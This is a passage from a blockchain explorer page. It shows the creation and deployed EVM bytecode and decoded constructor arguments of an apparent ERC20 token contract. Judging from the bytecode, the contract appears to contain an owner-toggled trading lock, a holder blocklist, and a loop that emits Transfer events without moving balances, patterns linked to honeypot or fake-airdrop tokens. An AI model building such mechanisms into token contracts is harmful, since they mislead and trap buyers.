ffff16565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516117049190611e1d565b60405180910390a36118bb565b61177d8160405180606001604052806026815260200161298760269139600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611a709092919063ffffffff16565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061181281600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611ad490919063ffffffff16565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516118b29190611e1d565b60405180910390a35b611917565b60011515600660009054906101000a900460ff16151514611916576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161190d9061288e565b60405180910390fd5b5b611922838383611b32565b505050565b61192f611006565b73ffffffffffffffffffffffffffffffffffffffff1661194d611b37565b73ffffffffffffffffffffffffffffffffffffffff16146119a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161199a906128fa565b60405180910390fd5b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b6000838311158290611ab8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611aaf9190611c81565b60405180910390fd5b5060008385611ac791906121dc565b9050809150509392505050565b6000808284611ae39190612287565b905083811015611b28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b1f90612966565b60405180910390fd5b8091505092915050565b505050565b600080611b42611b4b565b90508091505090565b60008073ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611bca57600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611bec565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff165b905090565b600081519050919050565b600082825260208201905092915050565b60005b83811015611c2b578082015181840152602081019050611c10565b60008484015250505050565b6000601f19601f8301169050919050565b6000611c5382611bf1565b611c5d8185611bfc565b9350611c6d818560208601611c0d565b611c7681611c37565b840191505092915050565b60006020820190508181036000830152611c9b8184611c48565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611cce82611ca3565b9050919050565b611cde81611cc3565b82525050565b6000602082019050611cf96000830184611cd5565b92915050565b600080fd5b600080fd5b611d1281611cc3565b8114611d1d57600080fd5b50565b600081359050611d2f81611d09565b92915050565b6000819050919050565b611d4881611d35565b8114611d5357600080fd5b50565b600081359050611d6581611d3f565b92915050565b60008060408385031215611d8257611d81611cff565b5b6000611d9085828601611d20565b9250506020611da185828601611d56565b9150509250929050565b60008115159050919050565b611dc081611dab565b82525050565b6000602082019050611ddb6000830184611db7565b92915050565b600060208284031215611df757611df6611cff565b5b6000611e0584828501611d20565b91505092915050565b611e1781611d35565b82525050565b6000602082019050611e326000830184611e0e565b92915050565b600080600060608486031215611e5157611e50611cff565b5b6000611e5f86828701611d20565b9350506020611e7086828701611d20565b9250506040611e8186828701611d56565b9150509250925092565b600080fd5b600080fd5b600080fd5b60008083601f840112611eb057611eaf611e8b565b5b8235905067ffffffffffffffff811115611ecd57611ecc611e90565b5b602083019150836020820283011115611ee957611ee8611e95565b5b9250929050565b600080600060408486031215611f0957611f08611cff565b5b600084013567ffffffffffffffff811115611f2757611f26611d04565b5b611f3386828701611e9a565b93509350506020611f4686828701611d56565b9150509250925092565b600060ff82169050919050565b611f6681611f50565b82525050565b6000602082019050611f816000830184611f5d565b92915050565b6000611f9282611cc3565b9050919050565b611fa281611f87565b8114611fad57600080fd5b50565b600081359050611fbf81611f99565b92915050565b60008060408385031215611fdc57611fdb611cff565b5b6000611fea85828601611d56565b9250506020611ffb85828601611fb0565b9150509250929050565b600063ffffffff82169050919050565b61201e81612005565b811461202957600080fd5b50565b60008135905061203b81612015565b92915050565b6000806040838503121561205857612057611cff565b5b600061206685828601611d20565b92505060206120778582860161202c565b9150509250929050565b61208a81611dab565b811461209557600080fd5b50565b6000813590506120a781612081565b92915050565b6000806000604084860312156120c6576120c5611cff565b5b600084013567ffffffffffffffff8111156120e4576120e3611d04565b5b6120f086828701611e9a565b9350935050602061210386828701612098565b9150509250925092565b6000806040838503121561212457612123611cff565b5b600061213285828601611d20565b925050602061214385828601611d20565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061219457607f821691505b6020821081036121a7576121a661214d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006121e782611d35565b91506121f283611d35565b925082820390508181111561220a576122096121ad565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061224a82611d35565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361227c5761227b6121ad565b5b600182019050919050565b600061229282611d35565b915061229d83611d35565b92508282019050808211156122b5576122b46121ad565b5b92915050565b7f436f756c64204e6f742053656e64000000000000000000000000000000000000600082015250565b60006122f1600e83611bfc565b91506122fc826122bb565b602082019050919050565b60006020820190508181036000830152612320816122e4565b9050919050565b600060408201905061233c6000830185611cd5565b6123496020830184611e0e565b9392505050565b60008151905061235f81612081565b92915050565b60006020828403121561237b5761237a611cff565b5b600061238984828501612350565b91505092915050565b7f436f756c64204e6f7420537061776e0000000000000000000000000000000000600082015250565b60006123c8600f83611bfc565b91506123d382612392565b602082019050919050565b600060208201905081810360008301526123f7816123bb565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061245a602583611bfc565b9150612465826123fe565b604082019050919050565b600060208201905081810360008301526124898161244d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006124ec602683611bfc565b91506124f782612490565b604082019050919050565b6000602082019050818103600083015261251b816124df565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061257e602483611bfc565b915061258982612522565b604082019050919050565b600060208201905081810360008301526125ad81612571565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612610602283611bfc565b915061261b826125b4565b604082019050919050565b6000602082019050818103600083015261263f81612603565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061267c601d83611bfc565b915061268782612646565b602082019050919050565b600060208201905081810360008301526126ab8161266f565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061270e602583611bfc565b9150612719826126b2565b604082019050919050565b6000602082019050818103600083015261273d81612701565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006127a0602383611bfc565b91506127ab82612744565b604082019050919050565b600060208201905081810360008301526127cf81612793565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612832602983611bfc565b915061283d826127d6565b604082019050919050565b6000602082019050818103600083015261286181612825565b9050919050565b50565b6000612878600083611bfc565b915061288382612868565b600082019050919050565b600060208201905081810360008301526128a78161286b565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006128e4602083611bfc565b91506128ef826128ae565b602082019050919050565b60006020820190508181036000830152612913816128d7565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000612950601b83611bfc565b915061295b8261291a565b602082019050919050565b6000602082019050818103600083015261297f81612943565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365a26469706673582212203b55c01cf8d9c8e2478897ae3c1382ab0475f62d6c8930586ea88f602c1138df64736f6c6343000813003300000000000000000000000090be77d5f12fe507b72b2983342d6762272dd07f00000000000000000000000067564a9fe2c7eabfcb86aacadf98372417ada763

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106102065760003560e01c806370a082311161011a578063a9059cbb116100ad578063d5abeb011161007c578063d5abeb01146105e5578063dd62ed3e14610603578063ebad8f1614610633578063f2fde38b1461063d578063fae772451461065957610206565b8063a9059cbb1461055f578063ad296d9d1461058f578063b7f4e899146105ab578063c2b7bbb6146105c957610206565b80638da5cb5b116100e95780638da5cb5b146104d557806395d89b41146104f35780639c9b4cdb14610511578063a457c2d71461052f57610206565b806370a082311461044d578063715018a61461047d5780637c70f3bf146104875780638d981e36146104b757610206565b806323b872dd1161019d578063395093511161016c57806339509351146103a757806342a5880c146103d7578063486d910f146103f557806349bd5a5e146104115780634ed9428e1461042f57610206565b806323b872dd1461031f57806326ededb81461034f5780632d3e69ea1461036b578063313ce5671461038957610206565b806316bd4aa2116101d957806316bd4aa21461029557806318160ddd146102c557806319e99550146102e357806321f83c431461030157610206565b806306fdde031461020b5780630754617214610229578063095ea7b31461024757806312fa6feb14610277575b600080fd5b610213610689565b6040516102209190611c81565b60405180910390f35b61023161071b565b60405161023e9190611ce4565b60405180910390f35b610261600480360381019061025c9190611d6b565b610741565b60405161026e9190611dc6565b60405180910390f35b61027f610764565b60405161028c9190611dc6565b60405180910390f35b6102af60048036038101906102aa9190611de1565b610777565b6040516102bc9190611dc6565b60405180910390f35b6102cd6107cd565b6040516102da9190611e1d565b60405180910390f35b6102eb6107d7565b6040516102f89190611e1d565b60405180910390f35b61030961080a565b6040516103169190611e1d565b60405180910390f35b61033960048036038101906103349190611e38565b610810565b6040516103469190611dc6565b60405180910390f35b61036960048036038101906103649190611ef0565b61083f565b005b61037361091c565b6040516103809190611dc6565b60405180910390f35b610391610933565b60405161039e9190611f6c565b60405180910390f35b6103c160048036038101906103bc9190611d6b565b61093c565b6040516103ce9190611dc6565b60405180910390f35b6103df610973565b6040516103ec9190611e1d565b60405180910390f35b61040f600480360381019061040a9190611fc5565b610997565b005b610419610ac4565b6040516104269190611ce4565b60405180910390f35b610437610aea565b6040516104449190611e1d565b60405180910390f35b61046760048036038101906104629190611de1565b610b0e565b6040516104749190611e1d565b60405180910390f35b610485610b57565b005b6104a1600480360381019061049c9190612041565b610b6b565b6040516104ae9190611dc6565b60405180910390f35b6104bf610b9a565b6040516104cc9190611ce4565b60405180910390f35b6104dd610bc0565b6040516104ea9190611ce4565b60405180910390f35b6104fb610bea565b6040516105089190611c81565b60405180910390f35b610519610c7c565b6040516105269190611ce4565b60405180910390f35b61054960048036038101906105449190611d6b565b610ca0565b6040516105569190611dc6565b60405180910390f35b61057960048036038101906105749190611d6b565b610d17565b6040516105869190611dc6565b60405180910390f35b6105a960048036038101906105a491906120ad565b610d3a565b005b6105b3610de7565b6040516105c09190611e1d565b60405180910390f35b6105e360048036038101906105de9190611de1565b610e0b565b005b6105ed610e57565b6040516105fa9190611e1d565b60405180910390f35b61061d6004803603810190610618919061210d565b610e7b565b60405161062a9190611e1d565b60405180910390f35b61063b610f02565b005b61065760048036038101906106529190611de1565b610f63565b005b610673600480360381019061066e9190611de1565b610fe6565b6040516106809190611dc6565b60405180910390f35b6060600880546106989061217c565b80601f01602080910402602001604051908101604052809291908181526020018280546106c49061217c565b80156107115780601f106106e657610100808354040283529160200191610711565b820191906000526020600020905b8154815290600101906020018083116106f457829003601f168201915b5050505050905090565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008061074c611006565b905061075981858561100e565b600191505092915050565b600e60009054906101000a900460ff1681565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600754905090565b60007f00000000000000000000000000000000000000000000000000000000013393864361080591906121dc565b905090565b61070881565b60008061081b611006565b90506108288582856111d7565b610833858585611263565b60019150509392505050565b610847611927565b60005b838390508110156109165783838281811061086857610867612210565b5b905060200201602081019061087d9190611de1565b73ffffffffffffffffffffffffffffffffffffffff16600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516108fb9190611e1d565b60405180910390a3808061090e9061223f565b91505061084a565b50505050565b6000600660009054906101000a900460ff16905090565b60006009905090565b600080610947611006565b90506109688185856109598589610e7b565b6109639190612287565b61100e565b600191505092915050565b7f0000000000000000000000000000000000000000000000000000000066789f2f81565b6109c433600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610810565b610a03576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109fa90612307565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1663a1e463d833846040518363ffffffff1660e01b8152600401610a3e929190612327565b6020604051808303816000875af1158015610a5d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a819190612365565b610ac0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab7906123de565b60405180910390fd5b5050565b600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b7f00000000000000000000000000000000000000000000006c6b935b8bbd40000081565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610b5f611927565b610b6960006119a5565b565b600d6020528160005260406000206020528060005260406000206000915091509054906101000a900460ff1681565b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060098054610bf99061217c565b80601f0160208091040260200160405190810160405280929190818152602001828054610c259061217c565b8015610c725780601f10610c4757610100808354040283529160200191610c72565b820191906000526020600020905b815481529060010190602001808311610c5557829003601f168201915b5050505050905090565b7f00000000000000000000000090be77d5f12fe507b72b2983342d6762272dd07f81565b600080610cab611006565b90506000610cb98286610e7b565b905083811015610cfe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf590612470565b60405180910390fd5b610d0b828686840361100e565b60019250505092915050565b600080610d22611006565b9050610d2f818585611263565b600191505092915050565b610d42611927565b60005b83839050811015610de1578160036000868685818110610d6857610d67612210565b5b9050602002016020810190610d7d9190611de1565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610dd99061223f565b915050610d45565b50505050565b7f000000000000000000000000000000000000000000000000000000000133938681565b610e13611927565b80600c60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b7f00000000000000000000000000000000000000000000006c6b935b8bbd40000081565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610f0a611927565b60011515600660009054906101000a900460ff16151503610f45576000600660006101000a81548160ff021916908315150217905550610f61565b6001600660006101000a81548160ff0219169083151502179055505b565b610f6b611927565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610fda576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fd190612502565b60405180910390fd5b610fe3816119a5565b50565b60036020528060005260406000206000915054906101000a900460ff1681565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361107d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107490612594565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e390612626565b60405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516111ca9190611e1d565b60405180910390a3505050565b60006111e38484610e7b565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461125d578181101561124f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161124690612692565b60405180910390fd5b61125c848484840361100e565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036112d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112c990612724565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611341576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611338906127b6565b60405180910390fd5b60008111611384576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137b90612848565b60405180910390fd5b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561141a5760008114611419576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114109061288e565b60405180910390fd5b5b60011515600660009054906101000a900460ff161515148061146e575061143f610bc0565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b806114ab575061147c610bc0565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b156118c057600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156115535750600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561171157611563838383611a6b565b6115cf8160405180606001604052806026815260200161298760269139600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611a709092919063ffffffff16565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061166481600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611ad490919063ffffffff16565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516117049190611e1d565b60405180910390a36118bb565b61177d8160405180606001604052806026815260200161298760269139600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611a709092919063ffffffff16565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061181281600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611ad490919063ffffffff16565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516118b29190611e1d565b60405180910390a35b611917565b60011515600660009054906101000a900460ff16151514611916576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161190d9061288e565b60405180910390fd5b5b611922838383611b32565b505050565b61192f611006565b73ffffffffffffffffffffffffffffffffffffffff1661194d611b37565b73ffffffffffffffffffffffffffffffffffffffff16146119a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161199a906128fa565b60405180910390fd5b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b6000838311158290611ab8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611aaf9190611c81565b60405180910390fd5b5060008385611ac791906121dc565b9050809150509392505050565b6000808284611ae39190612287565b905083811015611b28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b1f90612966565b60405180910390fd5b8091505092915050565b505050565b600080611b42611b4b565b90508091505090565b60008073ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611bca57600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611bec565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff165b905090565b600081519050919050565b600082825260208201905092915050565b60005b83811015611c2b578082015181840152602081019050611c10565b60008484015250505050565b6000601f19601f8301169050919050565b6000611c5382611bf1565b611c5d8185611bfc565b9350611c6d818560208601611c0d565b611c7681611c37565b840191505092915050565b60006020820190508181036000830152611c9b8184611c48565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611cce82611ca3565b9050919050565b611cde81611cc3565b82525050565b6000602082019050611cf96000830184611cd5565b92915050565b600080fd5b600080fd5b611d1281611cc3565b8114611d1d57600080fd5b50565b600081359050611d2f81611d09565b92915050565b6000819050919050565b611d4881611d35565b8114611d5357600080fd5b50565b600081359050611d6581611d3f565b92915050565b60008060408385031215611d8257611d81611cff565b5b6000611d9085828601611d20565b9250506020611da185828601611d56565b9150509250929050565b60008115159050919050565b611dc081611dab565b82525050565b6000602082019050611ddb6000830184611db7565b92915050565b600060208284031215611df757611df6611cff565b5b6000611e0584828501611d20565b91505092915050565b611e1781611d35565b82525050565b6000602082019050611e326000830184611e0e565b92915050565b600080600060608486031215611e5157611e50611cff565b5b6000611e5f86828701611d20565b9350506020611e7086828701611d20565b9250506040611e8186828701611d56565b9150509250925092565b600080fd5b600080fd5b600080fd5b60008083601f840112611eb057611eaf611e8b565b5b8235905067ffffffffffffffff811115611ecd57611ecc611e90565b5b602083019150836020820283011115611ee957611ee8611e95565b5b9250929050565b600080600060408486031215611f0957611f08611cff565b5b600084013567ffffffffffffffff811115611f2757611f26611d04565b5b611f3386828701611e9a565b93509350506020611f4686828701611d56565b9150509250925092565b600060ff82169050919050565b611f6681611f50565b82525050565b6000602082019050611f816000830184611f5d565b92915050565b6000611f9282611cc3565b9050919050565b611fa281611f87565b8114611fad57600080fd5b50565b600081359050611fbf81611f99565b92915050565b60008060408385031215611fdc57611fdb611cff565b5b6000611fea85828601611d56565b9250506020611ffb85828601611fb0565b9150509250929050565b600063ffffffff82169050919050565b61201e81612005565b811461202957600080fd5b50565b60008135905061203b81612015565b92915050565b6000806040838503121561205857612057611cff565b5b600061206685828601611d20565b92505060206120778582860161202c565b9150509250929050565b61208a81611dab565b811461209557600080fd5b50565b6000813590506120a781612081565b92915050565b6000806000604084860312156120c6576120c5611cff565b5b600084013567ffffffffffffffff8111156120e4576120e3611d04565b5b6120f086828701611e9a565b9350935050602061210386828701612098565b9150509250925092565b6000806040838503121561212457612123611cff565b5b600061213285828601611d20565b925050602061214385828601611d20565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061219457607f821691505b6020821081036121a7576121a661214d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006121e782611d35565b91506121f283611d35565b925082820390508181111561220a576122096121ad565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061224a82611d35565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361227c5761227b6121ad565b5b600182019050919050565b600061229282611d35565b915061229d83611d35565b92508282019050808211156122b5576122b46121ad565b5b92915050565b7f436f756c64204e6f742053656e64000000000000000000000000000000000000600082015250565b60006122f1600e83611bfc565b91506122fc826122bb565b602082019050919050565b60006020820190508181036000830152612320816122e4565b9050919050565b600060408201905061233c6000830185611cd5565b6123496020830184611e0e565b9392505050565b60008151905061235f81612081565b92915050565b60006020828403121561237b5761237a611cff565b5b600061238984828501612350565b91505092915050565b7f436f756c64204e6f7420537061776e0000000000000000000000000000000000600082015250565b60006123c8600f83611bfc565b91506123d382612392565b602082019050919050565b600060208201905081810360008301526123f7816123bb565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061245a602583611bfc565b9150612465826123fe565b604082019050919050565b600060208201905081810360008301526124898161244d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006124ec602683611bfc565b91506124f782612490565b604082019050919050565b6000602082019050818103600083015261251b816124df565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061257e602483611bfc565b915061258982612522565b604082019050919050565b600060208201905081810360008301526125ad81612571565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612610602283611bfc565b915061261b826125b4565b604082019050919050565b6000602082019050818103600083015261263f81612603565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061267c601d83611bfc565b915061268782612646565b602082019050919050565b600060208201905081810360008301526126ab8161266f565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061270e602583611bfc565b9150612719826126b2565b604082019050919050565b6000602082019050818103600083015261273d81612701565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006127a0602383611bfc565b91506127ab82612744565b604082019050919050565b600060208201905081810360008301526127cf81612793565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612832602983611bfc565b915061283d826127d6565b604082019050919050565b6000602082019050818103600083015261286181612825565b9050919050565b50565b6000612878600083611bfc565b915061288382612868565b600082019050919050565b600060208201905081810360008301526128a78161286b565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006128e4602083611bfc565b91506128ef826128ae565b602082019050919050565b60006020820190508181036000830152612913816128d7565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000612950601b83611bfc565b915061295b8261291a565b602082019050919050565b6000602082019050818103600083015261297f81612943565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365a26469706673582212203b55c01cf8d9c8e2478897ae3c1382ab0475f62d6c8930586ea88f602c1138df64736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000090be77d5f12fe507b72b2983342d6762272dd07f00000000000000000000000067564a9fe2c7eabfcb86aacadf98372417ada763

-----Decoded View---------------
Arg [0] : initialLPAddress (address): 0x90Be77D5f12fe507B72B2983342d6762272DD07F
Arg [1] : distributor_ (address): 0x67564a9fE2c7EABFCb86aAcADF98372417aDa763

-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 00000000000000000000000090be77d5f12fe507b72b2983342d6762272dd07f
Arg [1] : 00000000000000000000000067564a9fe2c7eabfcb86aacadf98372417ada763


Deployed Bytecode Sourcemap

